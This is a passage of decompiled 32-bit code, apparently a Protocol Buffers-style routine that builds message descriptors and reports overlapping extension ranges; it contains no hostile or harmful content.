                                                                                                                                                                    				unsigned int _t715;
                                                                                                                                                                    				intOrPtr _t716;
                                                                                                                                                                    				signed int _t717;
                                                                                                                                                                    				signed int _t718;
                                                                                                                                                                    				void* _t719;
                                                                                                                                                                    				unsigned int _t721;
                                                                                                                                                                    				void* _t724;
                                                                                                                                                                    				signed int _t730;
                                                                                                                                                                    				signed int _t731;
                                                                                                                                                                    				signed int _t737;
                                                                                                                                                                    				unsigned int _t740;
                                                                                                                                                                    				unsigned int _t745;
                                                                                                                                                                    				intOrPtr _t752;
                                                                                                                                                                    				signed int _t753;
                                                                                                                                                                    				intOrPtr _t754;
                                                                                                                                                                    				signed int _t755;
                                                                                                                                                                    				intOrPtr _t756;
                                                                                                                                                                    				intOrPtr _t757;
                                                                                                                                                                    				signed int _t758;
                                                                                                                                                                    				void* _t759;
                                                                                                                                                                    				signed int _t760;
                                                                                                                                                                    				signed int _t761;
                                                                                                                                                                    				signed int _t762;
                                                                                                                                                                    				signed int _t763;
                                                                                                                                                                    				unsigned int* _t766;
                                                                                                                                                                    				void* _t767;
                                                                                                                                                                    				unsigned int* _t768;
                                                                                                                                                                    				unsigned int _t771;
                                                                                                                                                                    				void* _t773;
                                                                                                                                                                    				signed int _t774;
                                                                                                                                                                    
                                                                                                                                                                    				_t657 = __edx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(0x51b1ec);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				_t774 = _t773 - 0x388;
                                                                                                                                                                    				_t384 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				 *(_t774 + 0x380) = _t384 ^ _t774;
                                                                                                                                                                    				_t386 =  *0x5596fc; // 0x9d48295
                                                                                                                                                                    				_push(_t386 ^ _t774);
                                                                                                                                                                    				 *[fs:0x0] = _t774 + 0x39c;
                                                                                                                                                                    				_t389 =  *(_t774 + 0x3b0);
                                                                                                                                                                    				_t559 =  *(_t774 + 0x3ac);
                                                                                                                                                                    				_t771 =  *(_t774 + 0x3b4);
                                                                                                                                                                    				_t715 = __ecx;
                                                                                                                                                                    				 *(_t774 + 0x1c) = __ecx;
                                                                                                                                                                    				 *(_t774 + 0x30) = _t559;
                                                                                                                                                                    				 *(_t774 + 0x24) = _t389;
                                                                                                                                                                    				 *(_t774 + 0x28) = 0;
                                                                                                                                                                    				_t776 = _t389;
                                                                                                                                                                    				if(_t389 == 0) {
                                                                                                                                                                    					_t389 =  *(__ecx + 0x3c);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t568 =  *((intOrPtr*)(_t715 + 4));
                                                                                                                                                                    				_t391 = E004704E0(_t559, _t776,  *((intOrPtr*)(_t715 + 4)),  *((intOrPtr*)(_t389 + 4)));
                                                                                                                                                                    				_t777 =  *((intOrPtr*)(_t391 + 0x10));
                                                                                                                                                                    				 *(_t774 + 0x14) = _t391;
                                                                                                                                                                    				if( *((intOrPtr*)(_t391 + 0x10)) != 0) {
                                                                                                                                                                    					L00409B50(_t559, _t568, _t657, _t391, 1, 0x2e);
                                                                                                                                                                    				}
                                                                                                                                                                    				L00407CA0( *(_t559 + 8) | 0xffffffff, _t657,  *(_t774 + 0x14), _t771,  *(_t559 + 8), 0);
                                                                                                                                                                    				_push( *(_t774 + 0x14));
                                                                                                                                                                    				_push(_t715);
                                                                                                                                                                    				E00476860(_t559,  *(_t559 + 8));
                                                                                                                                                                    				_t398 = E004704E0(_t559, _t777,  *((intOrPtr*)(_t715 + 4)),  *(_t559 + 8));
                                                                                                                                                                    				_t570 =  *(_t774 + 0x14);
                                                                                                                                                                    				 *_t771 = _t398;
                                                                                                                                                                    				 *(_t771 + 4) =  *(_t774 + 0x14);
                                                                                                                                                                    				_t659 =  *(_t715 + 0x3c);
                                                                                                                                                                    				 *(_t771 + 0xc) =  *(_t774 + 0x24);
                                                                                                                                                                    				 *(_t771 + 8) =  *(_t715 + 0x3c);
                                                                                                                                                                    				 *((short*)(_t771 + 0x14)) = 0;
                                                                                                                                                                    				 *(_t771 + 0x18) =  *(_t559 + 0x10);
                                                                                                                                                                    				_t401 =  *(_t559 + 0x10);
                                                                                                                                                                    				_t752 =  *((intOrPtr*)(_t715 + 4));
                                                                                                                                                                    				_t405 =  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8 +  *(_t559 + 0x10) + _t401 * 8;
                                                                                                                                                                    				_t778 = _t405;
                                                                                                                                                                    				if(_t405 != 0) {
                                                                                                                                                                    					_push(_t405);
                                                                                                                                                                    					 *(_t774 + 0x1c) = L004EF8DA(_t559, _t570, _t659, _t715, _t752, _t778);
                                                                                                                                                                    					_t774 = _t774 + 4;
                                                                                                                                                                    					_t35 = _t752 + 0x98; // 0x9c
                                                                                                                                                                    					L00482890(_t774 + 0x18, _t35);
                                                                                                                                                                    					_t405 =  *(_t774 + 0x18);
                                                                                                                                                                    					_t715 =  *(_t774 + 0x1c);
                                                                                                                                                                    				}
                                                                                                                                                                    				_t753 = 0;
                                                                                                                                                                    				 *((intOrPtr*)(_t771 + 0x1c)) = _t405;
                                                                                                                                                                    				if( *(_t559 + 0x10) <= 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					 *(_t771 + 0x20) =  *(_t559 + 0x30);
                                                                                                                                                                    					_t754 =  *((intOrPtr*)(_t715 + 4));
                                                                                                                                                                    					_t408 =  *(_t559 + 0x30) << 6;
                                                                                                                                                                    					_t781 = _t408;
                                                                                                                                                                    					if(_t408 == 0) {
                                                                                                                                                                    						L21:
                                                                                                                                                                    						_t755 = 0;
                                                                                                                                                                    						 *(_t771 + 0x24) = _t408;
                                                                                                                                                                    						if( *(_t559 + 0x30) <= 0) {
                                                                                                                                                                    							L24:
                                                                                                                                                                    							 *(_t771 + 0x28) =  *(_t559 + 0x40);
                                                                                                                                                                    							_t716 =  *((intOrPtr*)(_t715 + 4));
                                                                                                                                                                    							_t411 =  *(_t559 + 0x40) << 5;
                                                                                                                                                                    							_t789 = _t411;
                                                                                                                                                                    							if(_t411 == 0) {
                                                                                                                                                                    								L52:
                                                                                                                                                                    								_t717 = 0;
                                                                                                                                                                    								 *(_t771 + 0x2c) = _t411;
                                                                                                                                                                    								if( *(_t559 + 0x40) <= 0) {
                                                                                                                                                                    									L55:
                                                                                                                                                                    									_t560 =  *(_t774 + 0x30);
                                                                                                                                                                    									_t571 =  *(_t774 + 0x1c);
                                                                                                                                                                    									 *((intOrPtr*)(_t771 + 0x30)) =  *((intOrPtr*)(_t560 + 0x50));
                                                                                                                                                                    									_t756 =  *((intOrPtr*)( *(_t774 + 0x1c) + 4));
                                                                                                                                                                    									_t416 =  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50)) +  *((intOrPtr*)(_t560 + 0x50));
                                                                                                                                                                    									_t801 = _t416;
                                                                                                                                                                    									if(_t416 == 0) {
                                                                                                                                                                    										L83:
                                                                                                                                                                    										_t718 = 0;
                                                                                                                                                                    										 *(_t771 + 0x34) = _t416;
                                                                                                                                                                    										if( *((intOrPtr*)(_t560 + 0x50)) <= 0) {
                                                                                                                                                                    											L86:
                                                                                                                                                                    											_t572 =  *(_t774 + 0x1c);
                                                                                                                                                                    											 *(_t771 + 0x38) =  *(_t560 + 0x20);
                                                                                                                                                                    											_t418 =  *(_t560 + 0x20);
                                                                                                                                                                    											_t757 =  *((intOrPtr*)( *(_t774 + 0x1c) + 4));
                                                                                                                                                                    											_t422 =  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8 +  *(_t560 + 0x20) + _t418 * 8;
                                                                                                                                                                    											_t813 = _t422;
                                                                                                                                                                    											if(_t422 == 0) {
                                                                                                                                                                    												L131:
                                                                                                                                                                    												_t758 = 0;
                                                                                                                                                                    												 *(_t771 + 0x3c) = _t422;
                                                                                                                                                                    												if( *(_t560 + 0x20) <= 0) {
                                                                                                                                                                    													L134:
                                                                                                                                                                    													if(( *(_t560 + 0x64) >> 0x00000006 & 0x00000001) != 0) {
                                                                                                                                                                    														L137:
                                                                                                                                                                    														_t423 =  *(_t560 + 0x5c);
                                                                                                                                                                    														__eflags =  *(_t560 + 0x5c);
                                                                                                                                                                    														if(__eflags == 0) {
                                                                                                                                                                    															_t423 =  *( *0x55fb58 + 0x5c);
                                                                                                                                                                    														}
                                                                                                                                                                    														E004834E0( *(_t771 + 4), _t423, _t771, __eflags,  *(_t774 + 0x1c),  *(_t771 + 4), _t771);
                                                                                                                                                                    														L140:
                                                                                                                                                                    														_t663 =  *((intOrPtr*)(_t774 + 0x38));
                                                                                                                                                                    														L00475F70( *(_t774 + 0x2c),  *((intOrPtr*)(_t774 + 0x38)), _t771,  *(_t771 + 4),  *_t771, _t560, 1, _t771);
                                                                                                                                                                    														_t427 =  *(_t771 + 0x18);
                                                                                                                                                                    														 *(_t774 + 0x24) = 0;
                                                                                                                                                                    														if( *(_t771 + 0x18) <= 0) {
                                                                                                                                                                    															L159:
                                                                                                                                                                    															if( *((intOrPtr*)(_t771 + 0x30)) <= 0) {
                                                                                                                                                                    																L178:
                                                                                                                                                                    																 *[fs:0x0] =  *((intOrPtr*)(_t774 + 0x39c));
                                                                                                                                                                    																_pop(_t719);
                                                                                                                                                                    																_pop(_t759);
                                                                                                                                                                    																_pop(_t561);
                                                                                                                                                                    																return L004EEDC9(_t427, _t561,  *(_t774 + 0x380) ^ _t774, _t663, _t719, _t759);
                                                                                                                                                                    															}
                                                                                                                                                                    															_t562 = 1;
                                                                                                                                                                    															 *(_t774 + 0x28) = 1;
                                                                                                                                                                    															 *(_t774 + 0x18) = 0;
                                                                                                                                                                    															do {
                                                                                                                                                                    																_t721 =  *(_t771 + 0x34) +  *(_t774 + 0x18);
                                                                                                                                                                    																 *(_t774 + 0x24) = _t721;
                                                                                                                                                                    																if(_t562 >=  *((intOrPtr*)(_t771 + 0x30))) {
                                                                                                                                                                    																	goto L177;
                                                                                                                                                                    																} else {
                                                                                                                                                                    																	goto L162;
                                                                                                                                                                    																}
                                                                                                                                                                    																do {
                                                                                                                                                                    																	L162:
                                                                                                                                                                    																	_t583 =  *(_t771 + 0x34);
                                                                                                                                                                    																	_t427 =  *(_t721 + 4);
                                                                                                                                                                    																	_t760 = _t583 + _t562 * 8;
                                                                                                                                                                    																	if( *(_t721 + 4) <=  *(_t583 + _t562 * 8)) {
                                                                                                                                                                    																		goto L175;
                                                                                                                                                                    																	}
                                                                                                                                                                    																	_t663 =  *((intOrPtr*)(_t760 + 4));
                                                                                                                                                                    																	if( *((intOrPtr*)(_t760 + 4)) <=  *_t721) {
                                                                                                                                                                    																		goto L175;
                                                                                                                                                                    																	}
                                                                                                                                                                    																	_t430 = L004A1A10(_t774 + 0x25c, _t427 - 1);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x254)) = _t430;
                                                                                                                                                                    																	_t325 = _t430 + 1; // 0x1
                                                                                                                                                                    																	_t664 = _t325;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t585 =  *_t430;
                                                                                                                                                                    																		_t430 = _t430 + 1;
                                                                                                                                                                    																	} while (_t585 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x258)) = _t430 - _t664;
                                                                                                                                                                    																	_t433 = L004A1A10(_t774 + 0x374,  *_t721);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x36c)) = _t433;
                                                                                                                                                                    																	_t329 = _t433 + 1; // 0x1
                                                                                                                                                                    																	_t665 = _t329;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t587 =  *_t433;
                                                                                                                                                                    																		_t433 = _t433 + 1;
                                                                                                                                                                    																	} while (_t587 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x370)) = _t433 - _t665;
                                                                                                                                                                    																	_t436 = L004A1A10(_t774 + 0x2ac,  *((intOrPtr*)(_t760 + 4)) - 1);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x2a4)) = _t436;
                                                                                                                                                                    																	_t334 = _t436 + 1; // 0x1
                                                                                                                                                                    																	_t666 = _t334;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t590 =  *_t436;
                                                                                                                                                                    																		_t436 = _t436 + 1;
                                                                                                                                                                    																	} while (_t590 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x2a8)) = _t436 - _t666;
                                                                                                                                                                    																	_t439 = L004A1A10(_t774 + 0x34c,  *_t760);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x344)) = _t439;
                                                                                                                                                                    																	_t338 = _t439 + 1; // 0x1
                                                                                                                                                                    																	_t592 = _t338;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t667 =  *_t439;
                                                                                                                                                                    																		_t439 = _t439 + 1;
                                                                                                                                                                    																	} while (_t667 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x348)) = _t439 - _t592;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x104)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x154)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x8c)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x1a4)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x1f4)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x1cc)) = 0;
                                                                                                                                                                    																	_t761 = _t760 | 0xffffffff;
                                                                                                                                                                    																	 *(_t774 + 0x134) = _t761;
                                                                                                                                                                    																	 *(_t774 + 0x184) = _t761;
                                                                                                                                                                    																	 *(_t774 + 0xbc) = _t761;
                                                                                                                                                                    																	 *(_t774 + 0x1d4) = _t761;
                                                                                                                                                                    																	 *(_t774 + 0x224) = _t761;
                                                                                                                                                                    																	 *(_t774 + 0x1fc) = _t761;
                                                                                                                                                                    																	_t446 = L004BEFD0(_t774 + 0xb8, _t774 + 0x240, "Extension range $0 to $1 overlaps with already-defined range $2 to $3.", _t774 + 0x364, _t774 + 0x2c0, _t774 + 0x384, _t774 + 0x268, _t774 + 0x1dc, _t774 + 0x200, _t774 + 0x1ac, _t774 + 0x158, _t774 + 0x104);
                                                                                                                                                                    																	_t774 = _t774 + 0x2c;
                                                                                                                                                                    																	 *(_t774 + 0x3a4) = 9;
                                                                                                                                                                    																	_t663 = _t446;
                                                                                                                                                                    																	_t427 = L00474E20(_t446,  *(_t774 + 0x1c), _t771,  *(_t771 + 4),  *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x4c)) + _t562 * 4)), 1);
                                                                                                                                                                    																	 *(_t774 + 0x3a4) = _t761;
                                                                                                                                                                    																	if( *((intOrPtr*)(_t774 + 0x230)) >= 0x10) {
                                                                                                                                                                    																		_push( *((intOrPtr*)(_t774 + 0x21c)));
                                                                                                                                                                    																		_t427 = L004EEDBE();
                                                                                                                                                                    																		_t774 = _t774 + 4;
                                                                                                                                                                    																	}
                                                                                                                                                                    																	_t721 =  *(_t774 + 0x24);
                                                                                                                                                                    																	L175:
                                                                                                                                                                    																	_t562 = _t562 + 1;
                                                                                                                                                                    																} while (_t562 <  *((intOrPtr*)(_t771 + 0x30)));
                                                                                                                                                                    																_t562 =  *(_t774 + 0x28);
                                                                                                                                                                    																L177:
                                                                                                                                                                    																 *(_t774 + 0x18) =  *(_t774 + 0x18) + 8;
                                                                                                                                                                    																_t562 = _t562 + 1;
                                                                                                                                                                    																_t378 = _t562 - 1; // 0x0
                                                                                                                                                                    																 *(_t774 + 0x28) = _t562;
                                                                                                                                                                    															} while (_t378 <  *((intOrPtr*)(_t771 + 0x30)));
                                                                                                                                                                    															goto L178;
                                                                                                                                                                    														}
                                                                                                                                                                    														 *(_t774 + 0x20) = 0;
                                                                                                                                                                    														do {
                                                                                                                                                                    															_t564 =  *((intOrPtr*)(_t771 + 0x1c)) +  *(_t774 + 0x20);
                                                                                                                                                                    															_t448 = 0;
                                                                                                                                                                    															 *(_t774 + 0x18) = 0;
                                                                                                                                                                    															if( *((intOrPtr*)(_t771 + 0x30)) <= 0) {
                                                                                                                                                                    																goto L158;
                                                                                                                                                                    															}
                                                                                                                                                                    															do {
                                                                                                                                                                    																_t762 =  *(_t771 + 0x34) + _t448 * 8;
                                                                                                                                                                    																_t599 =  *((intOrPtr*)(_t564 + 0x14));
                                                                                                                                                                    																if( *_t762 <= _t599 && _t599 <  *((intOrPtr*)(_t762 + 4))) {
                                                                                                                                                                    																	_t452 = L004A1A10(_t774 + 0x324, _t599);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x31c)) = _t452;
                                                                                                                                                                    																	_t250 = _t452 + 1; // 0x1
                                                                                                                                                                    																	_t674 = _t250;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t600 =  *_t452;
                                                                                                                                                                    																		_t452 = _t452 + 1;
                                                                                                                                                                    																	} while (_t600 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x320)) = _t452 - _t674;
                                                                                                                                                                    																	_t454 =  *_t564;
                                                                                                                                                                    																	if( *((intOrPtr*)(_t454 + 0x14)) < 0x10) {
                                                                                                                                                                    																		 *((intOrPtr*)(_t774 + 0x2f4)) = _t454;
                                                                                                                                                                    																	} else {
                                                                                                                                                                    																		 *((intOrPtr*)(_t774 + 0x2f4)) =  *_t454;
                                                                                                                                                                    																	}
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x2f8)) =  *((intOrPtr*)(_t454 + 0x10));
                                                                                                                                                                    																	_t457 = L004A1A10(_t774 + 0x284,  *((intOrPtr*)(_t762 + 4)) - 1);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x27c)) = _t457;
                                                                                                                                                                    																	_t260 = _t457 + 1; // 0x1
                                                                                                                                                                    																	_t675 = _t260;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t603 =  *_t457;
                                                                                                                                                                    																		_t457 = _t457 + 1;
                                                                                                                                                                    																	} while (_t603 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x280)) = _t457 - _t675;
                                                                                                                                                                    																	_t460 = L004A1A10(_t774 + 0x2d4,  *_t762);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x2cc)) = _t460;
                                                                                                                                                                    																	_t264 = _t460 + 1; // 0x1
                                                                                                                                                                    																	_t605 = _t264;
                                                                                                                                                                    																	do {
                                                                                                                                                                    																		_t676 =  *_t460;
                                                                                                                                                                    																		_t460 = _t460 + 1;
                                                                                                                                                                    																	} while (_t676 != 0);
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x2d0)) = _t460 - _t605;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0xe0)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x40)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0xb8)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x180)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x130)) = 0;
                                                                                                                                                                    																	 *((intOrPtr*)(_t774 + 0x68)) = 0;
                                                                                                                                                                    																	_t763 = _t762 | 0xffffffff;
                                                                                                                                                                    																	 *(_t774 + 0x10c) = _t763;
                                                                                                                                                                    																	 *(_t774 + 0x6c) = _t763;
                                                                                                                                                                    																	 *(_t774 + 0xe4) = _t763;
                                                                                                                                                                    																	 *(_t774 + 0x1ac) = _t763;
                                                                                                                                                                    																	 *(_t774 + 0x15c) = _t763;
                                                                                                                                                                    																	 *(_t774 + 0x94) = _t763;
                                                                                                                                                                    																	_t466 = L004BEFD0(_t774 + 0xe0, _t774 + 0x25c, "Extension range $0 to $1 includes field \"$2\" ($3).", _t774 + 0x2ec, _t774 + 0x298, _t774 + 0x30c, _t774 + 0x330, _t774 + 0x74, _t774 + 0x138, _t774 + 0x184, _t774 + 0x40, _t774 + 0xdc);
                                                                                                                                                                    																	_t774 = _t774 + 0x2c;
                                                                                                                                                                    																	 *(_t774 + 0x3a4) = 7;
                                                                                                                                                                    																	_t663 = _t466;
                                                                                                                                                                    																	L00474E20(_t466,  *(_t774 + 0x1c), _t771,  *((intOrPtr*)(_t564 + 4)),  *((intOrPtr*)( *((intOrPtr*)( *(_t774 + 0x30) + 0x4c)) +  *(_t774 + 0x18) * 4)), 1);
                                                                                                                                                                    																	 *(_t774 + 0x3a4) = _t763;
                                                                                                                                                                    																	if( *((intOrPtr*)(_t774 + 0x24c)) >= 0x10) {
                                                                                                                                                                    																		_push( *((intOrPtr*)(_t774 + 0x238)));
                                                                                                                                                                    																		L004EEDBE();
                                                                                                                                                                    																		_t774 = _t774 + 4;
                                                                                                                                                                    																	}
                                                                                                                                                                    																}
                                                                                                                                                                    																_t448 =  *(_t774 + 0x18) + 1;
                                                                                                                                                                    																 *(_t774 + 0x18) = _t448;
                                                                                                                                                                    															} while (_t448 <  *((intOrPtr*)(_t771 + 0x30)));
                                                                                                                                                                    															L158:
                                                                                                                                                                    															 *(_t774 + 0x20) =  *(_t774 + 0x20) + 0x48;
                                                                                                                                                                    															_t427 =  *(_t774 + 0x24) + 1;
                                                                                                                                                                    															 *(_t774 + 0x24) = _t427;
                                                                                                                                                                    														} while (_t427 <  *(_t771 + 0x18));
                                                                                                                                                                    														goto L159;
                                                                                                                                                                    													}
                                                                                                                                                                    													 *(_t771 + 0x10) = 0;
                                                                                                                                                                    													goto L140;
                                                                                                                                                                    												}
                                                                                                                                                                    												_t724 = 0;
                                                                                                                                                                    												do {
                                                                                                                                                                    													_push(1);
                                                                                                                                                                    													_push( *(_t771 + 0x3c) + _t724);
                                                                                                                                                                    													_push(_t771);
                                                                                                                                                                    													L00478C70( *(_t774 + 0x1c),  *((intOrPtr*)( *((intOrPtr*)(_t560 + 0x1c)) + _t758 * 4)));
                                                                                                                                                                    													_t758 = _t758 + 1;
                                                                                                                                                                    													_t724 = _t724 + 0x48;
                                                                                                                                                                    												} while (_t758 <  *(_t560 + 0x20));
                                                                                                                                                                    												goto L134;
                                                                                                                                                                    											}
                                                                                                                                                                    											_push(_t422);
                                                                                                                                                                    											 *(_t774 + 0x18) = L004EF8DA(_t560, _t572, _t659, _t718, _t757, _t813);
                                                                                                                                                                    											_t475 =  *(_t757 + 0x9c);
                                                                                                                                                                    											_t687 = _t774 + 0x18;
                                                                                                                                                                    											_t774 = _t774 + 4;
                                                                                                                                                                    											if(_t687 >= _t475) {
                                                                                                                                                                    												L110:
                                                                                                                                                                    												_t189 = _t757 + 0xa0; // 0x41544146
                                                                                                                                                                    												_t613 =  *_t189;
                                                                                                                                                                    												__eflags = _t475 - _t613;
                                                                                                                                                                    												if(_t475 != _t613) {
                                                                                                                                                                    													L127:
                                                                                                                                                                    													_t476 =  *(_t757 + 0x9c);
                                                                                                                                                                    													__eflags = _t476;
                                                                                                                                                                    													if(_t476 != 0) {
                                                                                                                                                                    														 *_t476 =  *(_t774 + 0x14);
                                                                                                                                                                    													}
                                                                                                                                                                    													_t560 =  *(_t774 + 0x30);
                                                                                                                                                                    													L130:
                                                                                                                                                                    													 *(_t757 + 0x9c) =  *(_t757 + 0x9c) + 4;
                                                                                                                                                                    													_t422 =  *(_t774 + 0x14);
                                                                                                                                                                    													goto L131;
                                                                                                                                                                    												}
                                                                                                                                                                    												_t190 = _t757 + 0x98; // 0xc0
                                                                                                                                                                    												_t689 =  *_t190;
                                                                                                                                                                    												_t478 = _t475 - _t689 >> 2;
                                                                                                                                                                    												__eflags = _t478 - 0x3ffffffe;
                                                                                                                                                                    												if(_t478 > 0x3ffffffe) {
                                                                                                                                                                    													_t478 = E004EE38E("vector<T> too long");
                                                                                                                                                                    												}
                                                                                                                                                                    												_t479 = _t478 + 1;
                                                                                                                                                                    												_t615 = _t613 - _t689 >> 2;
                                                                                                                                                                    												__eflags = _t479 - _t615;
                                                                                                                                                                    												if(_t479 <= _t615) {
                                                                                                                                                                    													goto L127;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													_t565 = _t615;
                                                                                                                                                                    													_t691 = _t565 >> 1;
                                                                                                                                                                    													__eflags = 0x3fffffff - _t691 - _t565;
                                                                                                                                                                    													if(0x3fffffff - _t691 >= _t565) {
                                                                                                                                                                    														_t560 = _t565 + _t691;
                                                                                                                                                                    														__eflags = _t560;
                                                                                                                                                                    													} else {
                                                                                                                                                                    														_t560 = 0;
                                                                                                                                                                    													}
                                                                                                                                                                    													__eflags = _t560 - _t479;
                                                                                                                                                                    													if(_t560 < _t479) {
                                                                                                                                                                    														_t560 = _t479;
                                                                                                                                                                    													}
                                                                                                                                                                    													__eflags = _t560 - 0x3fffffff;
                                                                                                                                                                    													if(_t560 > 0x3fffffff) {
                                                                                                                                                                    														E004EE38E("vector<T> too long");
                                                                                                                                                                    													}
                                                                                                                                                                    													__eflags = _t615 - _t560;
                                                                                                                                                                    													if(_t615 >= _t560) {
                                                                                                                                                                    														goto L127;
                                                                                                                                                                    													} else {
                                                                                                                                                                    														 *(_t774 + 0x18) = 0;
                                                                                                                                                                    														__eflags = _t560;
                                                                                                                                                                    														if(__eflags <= 0) {
                                                                                                                                                                    															L124:
                                                                                                                                                                    															E004EF0C0( *(_t774 + 0x20),  *(_t757 + 0x98), ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2) + ( *(_t757 + 0x9c) -  *(_t757 + 0x98) >> 2));
                                                                                                                                                                    															_t486 =  *(_t757 + 0x98);
                                                                                                                                                                    															_t774 = _t774 + 0xc;
                                                                                                                                                                    															_t730 =  *(_t757 + 0x9c) - _t486 >> 2;
                                                                                                                                                                    															__eflags = _t486;
                                                                                                                                                                    															if(_t486 != 0) {
                                                                                                                                                                    																_push(_t486);
                                                                                                                                                                    																L004EEDBE();
                                                                                                                                                                    																_t774 = _t774 + 4;
                                                                                                                                                                    															}
                                                                                                                                                                    															_t487 =  *(_t774 + 0x18);
                                                                                                                                                                    															 *((intOrPtr*)(_t757 + 0xa0)) = _t487 + _t560 * 4;
                                                                                                                                                                    															 *(_t757 + 0x9c) = _t487 + _t730 * 4;
                                                                                                                                                                    															 *(_t757 + 0x98) = _t487;
                                                                                                                                                                    															goto L127;
                                                                                                                                                                    														}
                                                                                                                                                                    														_push(_t560 * 4);
                                                                                                                                                                    														_t489 = L004EF8DA(_t560, _t615, _t560 * 4, 0, _t757, __eflags);
                                                                                                                                                                    														_t774 = _t774 + 4;
                                                                                                                                                                    														 *(_t774 + 0x18) = _t489;
                                                                                                                                                                    														__eflags = _t489;
                                                                                                                                                                    														if(_t489 == 0) {
                                                                                                                                                                    															 *(_t774 + 0x2c) = 0;
                                                                                                                                                                    															 *(_t774 + 0x28) = 0x52fd98;
                                                                                                                                                                    															 *(_t774 + 0x3a4) = 5;
                                                                                                                                                                    															E00404190(_t774 + 0x28);
                                                                                                                                                                    															goto L137;
                                                                                                                                                                    														}
                                                                                                                                                                    														goto L124;
                                                                                                                                                                    													}
                                                                                                                                                                    												}
                                                                                                                                                                    											}
                                                                                                                                                                    											_t731 =  *(_t757 + 0x98);
                                                                                                                                                                    											if(_t731 > _t687) {
                                                                                                                                                                    												goto L110;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t620 =  *((intOrPtr*)(_t757 + 0xa0));
                                                                                                                                                                    											_t695 = _t687 - _t731 >> 2;
                                                                                                                                                                    											 *(_t774 + 0x28) = _t695;
                                                                                                                                                                    											if(_t475 != _t620) {
                                                                                                                                                                    												L107:
                                                                                                                                                                    												_t696 =  *(_t757 + 0x98) + _t695 * 4;
                                                                                                                                                                    												_t493 =  *(_t757 + 0x9c);
                                                                                                                                                                    												if(_t493 != 0) {
                                                                                                                                                                    													 *_t493 =  *_t696;
                                                                                                                                                                    												}
                                                                                                                                                                    												goto L130;
                                                                                                                                                                    											}
                                                                                                                                                                    											_t495 = _t475 - _t731 >> 2;
                                                                                                                                                                    											if(_t495 > 0x3ffffffe) {
                                                                                                                                                                    												_t495 = E004EE38E("vector<T> too long");
                                                                                                                                                                    											}
                                                                                                                                                                    											_t623 = _t620 - _t731 >> 2;
                                                                                                                                                                    											_t496 = _t495 + 1;
                                                                                                                                                                    											 *(_t774 + 0x20) = _t623;
                                                                                                                                                                    											if(_t496 <= _t623) {
                                                                                                                                                                    												goto L107;
                                                                                                                                                                    											} else {
                                                                                                                                                                    												_t698 = _t623 >> 1;
                                                                                                                                                                    												if(0x3fffffff - _t698 >= _t623) {
                                                                                                                                                                    													_t624 = _t623 + _t698;
                                                                                                                                                                    													__eflags = _t624;
                                                                                                                                                                    												} else {
                                                                                                                                                                    													_t624 = 0;
                                                                                                                                                                    												}
                                                                                                                                                                    												 *(_t774 + 0x18) = _t624;
                                                                                                                                                                    												if(_t624 < _t496) {
                                                                                                                                                                    													_t624 = _t496;
                                                                                                                                                                    													 *(_t774 + 0x18) = _t624;
